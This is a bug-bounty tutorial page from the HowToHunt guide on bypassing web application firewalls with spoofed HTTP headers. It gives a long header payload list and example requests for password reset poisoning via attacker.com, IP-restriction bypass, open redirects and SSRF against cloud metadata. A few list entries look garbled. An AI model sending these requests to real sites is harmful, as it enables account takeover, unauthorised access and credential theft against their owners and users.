🕵️
HowToHunt
  • HowToHunt.md
  • API Testing
    • Hidden API Functionality Exposure
    • Reverse Engineer an API
  • Account Takeover Methodology
    • Account Takeover Methodology
  • Application Level DoS
    • Application Level DoS Methods
  • Authentication Bypass
    • 2FA Bypasses
    • OTP Bypass
    • Account Ban Bypass
  • Broken-Link Hijacking
    • Broken-Link Hijacking
  • Broken Auth And Session Management
    • Session Based Bugs
  • CMS
    • AEM
    • Drupal
    • Wordpress
    • Moodle
  • CORS
    • CORS
    • CORS Bypasses
  • CSRF
    • CSRF
    • CSRF MindMap
    • CSRF Bypass
  • Finding CVEs
    • CVES
  • CheckList
    • Web Application Pentesting Checklist
    • Web Checklist by Chintan Gurjar.pdf
    • Web Checklist by Tushra Verma.pdf
    • Mindmap by Rohit Gautam
    • Mindmap by Cristian Cornea
  • Web Page Source Code Review
    • Web Page Code Review Tips
  • EXIF Geo Data Not Stripped
    • EXIF Geo Data Not Stripped
  • File Upload Bypass
    • File Upload Bypass
  • Find Origin IP
    • Find Origin
  • GraphQL
    • GraphQL
  • HTTP Desync Attack
    • HTTP_Desync
  • Host-Header Attack
    • Host-Header
  • HTML-Injection
    • HTML-Injection
  • IDOR
    • IDOR
  • JWT ATTACK
    • JWT
  • JIRA ATTACK
    • JIRA
  • MFA Bypass
    • MFA Bypasses
    • 2FA-Bypass
  • Misconfigurations
    • Default Credential And Admin Panel
    • Docker
    • S3 Bucket
  • OAuth
    • OAuth
    • OAuth Hunting
  • Open Redirection
    • Find OpenRedirect Trick
    • Open Redirection Bypass
  • Parameter Pollution
    • Parameter Pollution In Social Sharing Buttons
  • Password Reset Functionality
    • MindMap
    • Password Reset Token Leakage
    • Account_Takeover_By_Password_Reset_Functionality
    • Password_Reset_Flaws
  • Rate Limit
    • Rate Limit Flaws
    • Rate-Limit Bypass
    • No Rate-Limit on Verify-PhoneNo
    • No Rate-limit on Invite User
    • No Rate-limit on Promo
    • No Rate-limit on Verify-email
    • No Rate-limit on forget-password
  • Race Condition
    • Race Condition
  • Recon
    • Github
    • Recon Workflow
    • Subdomain Enumeration
  • SQLi
    • SQL Injection.md
  • SAML
    • SAML
  • SSRF
    • SSRF
    • Blind SSRF
  • SSTI
    • SSTI
  • Sign Up Functionality
    • Sign Up Bugs
    • Sign Up MindMap
  • Sensitive Info Leaks
    • Github Recon Method
    • Github-Dorks
    • Github Dorks All
    • Google Dorks
    • Shodan CVE Dorks
    • Version Leaks
  • Status Code Bypass
    • Status_Code_Bypass Tips
    • 403 Bypass
  • Subdomain Takeover
    • Subdomain Takeover - Detail Method
    • Subdomain Takeover - Easy Method
    • Subs or Top level Domain
  • Tabnabbing
    • Tabnabbing
  • WAF Bypasses
    • WAF Bypass Using Headers
  • Weak Password Policy
    • Weak Password Policy
  • XSS
    • XSS
    • Bypass CSP
    • XSS Bypass
    • Automated XSS
    • Post Message Xss
  • XXE
    • XXE Methods
    • Billion Laugh Attack
Powered by GitBook
On this page
  • Introduction
  • How Does WAF Header Manipulation Work?
  • Common Headers Used for WAF Bypass
  • Practical Attack Scenario: Password Reset Poisoning
  • Step 1: Identifying the Vulnerability
  • Step 2: Sending a Manipulated Request
  • Step 3: Intercepting the Response
  • Other Uses of WAF Header Manipulation
  • 1. Bypassing IP-Based Restrictions
  • 2. Exploiting Open Redirects
  • 3. SSRF (Server-Side Request Forgery) Exploitation
  • Author
  1. WAF Bypasses

WAF Bypass Using Headers

Introduction

Web Application Firewalls (WAFs) are commonly used to filter and monitor HTTP traffic to protect web applications from attacks. However, attackers can bypass WAFs by manipulating HTTP headers. One such attack involves Password Reset Poisoning, where an attacker leverages forged headers to manipulate the behavior of the application, particularly in password reset functionalities.

This document outlines techniques to bypass WAFs using custom headers, including examples of how they can be used in password reset poisoning and other similar attacks.

How Does WAF Header Manipulation Work?

Many web applications rely on HTTP headers to determine a user's origin, session, or intended destination. By modifying these headers, an attacker can:

  • Trick the application into believing the request is coming from a trusted source.

  • Redirect password reset links to an attacker's domain.

  • Bypass security measures by manipulating X-Forwarded-For, Referer, or Origin headers.

  • Spoof a legitimate user by injecting headers used for authentication.

Some applications also have misconfigured reverse proxies, which trust certain headers to determine the client’s IP address, allowing internal access through header manipulation.

Common Headers Used for WAF Bypass

Below are the most commonly used headers for WAF bypass and server-side manipulation:

X-Forwarded-Host: attacker.com
X-Forwarded-Port: 443
X-Forwarded-Scheme: https
Origin: null
nullOrigin: [siteDomain].attacker.com
X-Frame-Options: Allow
X-Forwarded-For: 127.0.0.1
X-Client-IP: 127.0.0.1
Client-IP: 127.0.0.1
Proxy-Host: 127.0.0.1
Request-Uri: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Server: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Forward-For: 127.0.0.1
Base-Url: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Url: 127.0.0.1
Redirect: 127.0.0.1
Real-Ip: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Uri: 127.0.0.1
Url: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Proxy-Url: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Original-Url:
X-Forwarded-Server:
X-Host:
X-Forwarded-Host:
X-Rewrite-Url:

Practical Attack Scenario: Password Reset Poisoning

Step 1: Identifying the Vulnerability

  • Many web applications send password reset links based on the Host or Origin headers.

  • If these headers are not validated properly, an attacker can poison the password reset URL.

Step 2: Sending a Manipulated Request

Example Request:

POST /reset-password HTTP/1.1
Host: victim-site.com
X-Forwarded-Host: attacker.com
X-Forwarded-For: 127.0.0.1
X-Real-IP: 127.0.0.1
Content-Type: application/x-www-form-urlencoded

email=victim@victim.com

Step 3: Intercepting the Response

If the server does not validate the X-Forwarded-Host header, it might send a password reset link to the victim that looks like this:

https://attacker.com/reset?token=abcdef123456

Now, when the victim clicks on the reset link, they will be redirected to the attacker's site, where their credentials can be stolen via phishing.

Other Uses of WAF Header Manipulation

1. Bypassing IP-Based Restrictions

  • Some web applications block access based on the user’s IP address.

  • If the WAF trusts headers like X-Forwarded-For, an attacker can spoof their IP and gain access.

Example Request:

GET /admin HTTP/1.1
Host: target.com
X-Forwarded-For: 192.168.1.100

  • If 192.168.1.100 is a trusted internal IP, access will be granted.

2. Exploiting Open Redirects

Some applications use Referer, Redirect, or X-Forwarded-Host to construct redirect URLs.

Example Request:

GET /login?redirect=https://victim.com HTTP/1.1
Host: target.com
X-Forwarded-Host: attacker.com

  • The victim is redirected to a phishing page hosted by the attacker.

3. SSRF (Server-Side Request Forgery) Exploitation

Some applications fetch remote resources based on user input. By modifying headers, an attacker can:

  • Force the application to fetch internal resources.

  • Target AWS metadata services or other sensitive internal services.

Example Request:

GET /api/v1/fetch HTTP/1.1
Host: target.com
X-Forwarded-For: 169.254.169.254
X-Real-IP: 169.254.169.254

  • If the application fetches the resource using these headers, it could leak AWS credentials or internal system information.

Author

PreviousTabnabbingNextWeak Password Policy

Last updated 1 month ago

Enhanced and reformatted for HowToHunt repository by

Virdoex_hunter
remonsec
remonsec